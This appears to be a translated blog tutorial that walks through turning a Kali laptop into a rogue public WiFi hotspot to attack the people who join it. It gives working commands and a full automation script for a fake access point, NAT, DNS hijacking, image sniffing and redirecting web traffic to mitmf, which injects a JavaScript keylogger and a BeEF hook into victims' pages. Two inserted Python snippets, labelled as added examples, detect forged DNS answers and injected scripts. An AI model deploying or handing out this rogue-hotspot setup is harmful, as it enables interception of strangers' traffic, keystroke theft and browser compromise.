[Xieying Tutorial] Using Kali as a public WiFi phishing hotspot

2015-09-23 01:58:47 -0400
[Xieying Tutorial] Xieying
For at least a year I had wanted to set up a phishing hotspot on my Kali laptop. But the NAT in the online tutorials was written wrong, other people's ready-made scripts and my machine didn't get along, and the closest I ever got to success was QQ chat working while even Baidu wouldn't load.
Xieying's site: http://xieying.wodemo.com
Recently I suddenly realized where the problem was, and successfully got the WiFi hotspot, DNS hijacking, JS injection, image sniffing, and attack testing of the user's browser in combination with BeEF all working.

So I'm writing this to share it, in the hope that comrades who had the same confusion I did will get something out of it.

Setting up the hotspot

Tools: isc-dhcp-server; the Aircrack-ng suite; iptables

Procedure:

First write the DHCP configuration file /etc/dhcp/dhcpd.conf

with the following content:

```
authoritative;

default-lease-time 700;
max-lease-time 8000;

subnet 10.0.0.0 netmask 255.255.255.0 {
  option routers 10.0.0.1;
  option subnet-mask 255.255.255.0;

  option domain-name-servers 10.0.0.1;

  range 10.0.0.10 10.0.0.100;
}
```
Here 10.0.0.1 serves as both the gateway and the DNS server address.

Next, prepare the wireless card

```sh
ifconfig wlan1 down   # change wlan1 to your card
iwconfig wlan1 mode monitor
ifconfig wlan1 up
airmon-ng start wlan1
```
The commands above prevent the error: Error: Got channel -1, expected a value > 0.

Then create the hotspot with airbase-ng

```sh
airbase-ng -e Fishing -c 11 mon0
```
The hotspot's network traffic is virtualized onto the at0 interface

```sh
ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
```
Enable IP forwarding

```sh
echo 1 > /proc/sys/net/ipv4/ip_forward
```
Start DHCP

```sh
dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0
service isc-dhcp-server start
```
Now try connecting with a phone: it should connect, but without internet access

So configure NAT

```sh
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE   # source NAT on eth0
iptables -A FORWARD -i at0 -o eth0 -j ACCEPT            # forward hotspot traffic (it arrives on airbase-ng's at0 interface) to the wired card, or whichever card has internet access
iptables -A FORWARD -p tcp --syn -s 10.0.0.0/24 -j TCPMSS --set-mss 1356   # clamp the maximum segment size
```
Note the third command, which adjusts the MSS: without it the consequences are severe (I was stuck here for ages).

(DNS may still fail at this point; see the DNS proxy setup later in this article.)

Hijacking DNS

Tool: dnschef

Procedure:

```sh
dnschef -i 10.0.0.1 --nameserver 210.73.64.1#53
```
The command above starts a DNS server on 10.0.0.1 (the fake AP's gateway and DNS IP from above) and forwards every request to 210.73.64.1 for resolution. Obviously this is only a "proxy" and doesn't hijack anything.

So we evolve it:

```sh
dnschef --fakedomains=taobao.com,baidu.com --fakeip=10.0.0.1 -i 10.0.0.1 --nameserver 210.73.64.1#53
```
This resolves taobao.com and baidu.com to this machine.

Of course more rules can be written in a file:

[screenshot]

I'll leave the rest to your imagination.

P.S.: this conflicts with mitmf later on: mitmf identifies the destination host from the HTTP protocol and forwards accordingly, so it is not affected by this DNS forgery.
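From the client's side, the forgery described above is easy to spot: a public name such as baidu.com suddenly answers with the hotspot gateway's own private address. The following check is an added example (not code from the original post); the sample answers, the gateway address and the IP for example.org are constructed values.

```python
# Added example: flag DNS answers that look like the dnschef --fakeip trick,
# i.e. a public domain resolving to private/loopback space or to the gateway
# that the DHCP lease also advertised as the resolver.
import ipaddress
from typing import Dict, List

# Constructed sample: what a phone on the fake AP would be handed back.
GATEWAY = "10.0.0.1"   # also the DNS server from the dhcpd.conf above
SAMPLE_ANSWERS: Dict[str, List[str]] = {
    "taobao.com": ["10.0.0.1"],        # forged: points back at the gateway
    "baidu.com": ["10.0.0.1"],         # forged
    "example.org": ["93.184.216.34"],  # constructed "passed through" answer
}

# Constructed answers from a pinned, trusted resolver (e.g. obtained over
# an encrypted channel), used as a second opinion.
TRUSTED_ANSWERS: Dict[str, List[str]] = {
    "taobao.com": ["203.119.175.1"],   # constructed, not a real lookup
    "baidu.com": ["39.156.66.10"],     # constructed, not a real lookup
    "example.org": ["93.184.216.34"],
}


def is_suspicious(addr: str, gateway: str) -> bool:
    """A public domain must not resolve to non-global space (RFC1918,
    loopback, link-local, reserved) or to the gateway/resolver itself."""
    ip = ipaddress.ip_address(addr)
    if not ip.is_global:
        return True
    return addr == gateway


def flag_forged_names(answers: Dict[str, List[str]], gateway: str) -> List[str]:
    """Names whose answers fail the address-space check, sorted."""
    return sorted(name for name, addrs in answers.items()
                  if any(is_suspicious(a, gateway) for a in addrs))


def names_disagreeing_with_trusted(answers: Dict[str, List[str]],
                                   trusted: Dict[str, List[str]]) -> List[str]:
    """Names where the hotspot resolver and the trusted resolver share
    no address at all (CDNs may differ partially, so require zero overlap)."""
    out = []
    for name, addrs in answers.items():
        if name in trusted and not set(addrs) & set(trusted[name]):
            out.append(name)
    return sorted(out)
```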

Image sniffing

This is a fun feature

Tool: driftnet

Procedure:

```sh
driftnet -i at0
```
The program then opens a small window showing every image in transit:

[screenshot]

Click an image to save it to /

You can also enable adjunct mode:

```sh
driftnet -i at0 -a
```
which saves the images directly and prints their file names.

Hijacking web traffic

This is even more fun

Tools: BeEF; mitmf; iptables

Procedure:

First redirect the port 80 traffic (10000 is mitmf's default listening port)

```sh
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
```
Then start mitmf

```sh
mitmf -i at0 --replace --search-str aaaaa --replace-str bbbbb   # replace every aaaaa in web pages with bbbbb
```
[screenshot: Baidu search for aaaaa]

In the screenshot above I searched Baidu for aaaaa

OK, enough pranks; here's the real stuff

```sh
mitmf -i at0 --inject --js-url http://10.0.0.1:3000/hook.js --jskeylogger
```
Here mitmf injects the JS keylogger and BeEF's attack test script; for other attack methods (such as javapwn) see http://www.freebuf.com/tools/45796.html
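The injection above leaves a visible trace in the page a client receives: an extra script tag whose host is the hotspot gateway rather than the site's own origin. The following detector is an added example (not code from the original post); the sample page, its origin and the script URLs are constructed.

```python
# Added example: find <script src> URLs that point at a non-global host
# (private, loopback, link-local), the fingerprint of a hook.js injected
# in transit by a gateway such as the one described above.
import ipaddress
from html.parser import HTMLParser
from typing import List
from urllib.parse import urlparse

# Constructed sample: one legitimate same-origin script plus one injected
# hook served from the hotspot gateway, as a client on the fake AP sees it.
PAGE_ORIGIN = "http://www.baidu.com"
SAMPLE_HTML = """<html><head>
<script src="http://www.baidu.com/static/app.js"></script>
<script src="/static/relative.js"></script>
<script src="http://10.0.0.1:3000/hook.js"></script>
</head><body>hello</body></html>"""


class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> tag."""
    def __init__(self) -> None:
        super().__init__()
        self.sources: List[str] = []

    def handle_starttag(self, tag, attrs) -> None:
        if tag.lower() == "script":
            for name, value in attrs:
                if name.lower() == "src" and value:
                    self.sources.append(value)


def host_is_non_global(host: str) -> bool:
    """True only for literal IPs outside global unicast space."""
    try:
        return not ipaddress.ip_address(host).is_global
    except ValueError:
        return False   # a hostname, not an IP literal


def find_injected_scripts(html: str, page_origin: str) -> List[str]:
    """Return third-party script URLs whose host is a non-global IP.
    Same-origin and relative URLs are not a signal and are skipped."""
    collector = ScriptSrcCollector()
    collector.feed(html)
    origin_host = urlparse(page_origin).hostname
    hits = []
    for src in collector.sources:
        parsed = urlparse(src)
        if not parsed.hostname or parsed.hostname == origin_host:
            continue
        if host_is_non_global(parsed.hostname):
            hits.append(src)
    return hits
```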

Finally, test the user's browser with BeEF!

```sh
/usr/share/beef-xss/beef
```
Open http://127.0.0.1:3000/ui/panel in a browser; the initial username and password are both beef


BeEF is too deep for me and I haven't fully figured it out, so please explore on your own. Oh, and don't forget to capture packets.

Finally, here is the script I wrote

```sh
# flush iptables
iptables -t nat -F
iptables -t nat -X
iptables -t nat -P PREROUTING ACCEPT
iptables -t nat -P POSTROUTING ACCEPT
iptables -t nat -P OUTPUT ACCEPT
iptables -t mangle -F
iptables -t mangle -X
iptables -t mangle -P PREROUTING ACCEPT
iptables -t mangle -P INPUT ACCEPT
iptables -t mangle -P FORWARD ACCEPT
iptables -t mangle -P OUTPUT ACCEPT
iptables -t mangle -P POSTROUTING ACCEPT
iptables -F
iptables -X
iptables -P FORWARD ACCEPT
iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -t raw -F
iptables -t raw -X
iptables -t raw -P PREROUTING ACCEPT
iptables -t raw -P OUTPUT ACCEPT
# create the hotspot
airmon-ng stop mon0
ifconfig wlan1 down   # change wlan1 to your card
iwconfig wlan1 mode monitor
ifconfig wlan1 up
airmon-ng start wlan1 &
sleep 2
gnome-terminal -x bash -c "airbase-ng -e Fishing -c 11 mon0"   # adjust as needed
sleep 2
ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
echo 1 > /proc/sys/net/ipv4/ip_forward
# configure dhcp
dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0
sleep 2
/etc/init.d/isc-dhcp-server start
# nat
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
iptables -A FORWARD -i at0 -o eth0 -j ACCEPT   # hotspot clients arrive on at0, airbase-ng's tap interface
iptables -A FORWARD -p tcp --syn -s 10.0.0.0/24 -j TCPMSS --set-mss 1356
# hijack port 80
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
# hijack dns
gnome-terminal -x bash -c "dnschef -i 10.0.0.1 --nameserver 210.73.64.1#53"

# start beef and inject the js keylogger into the port 80 traffic
gnome-terminal -x bash -c "mitmf -i at0 --inject --js-url http://10.0.0.1:3000/hook.js --jskeylogger"
beef-xss
```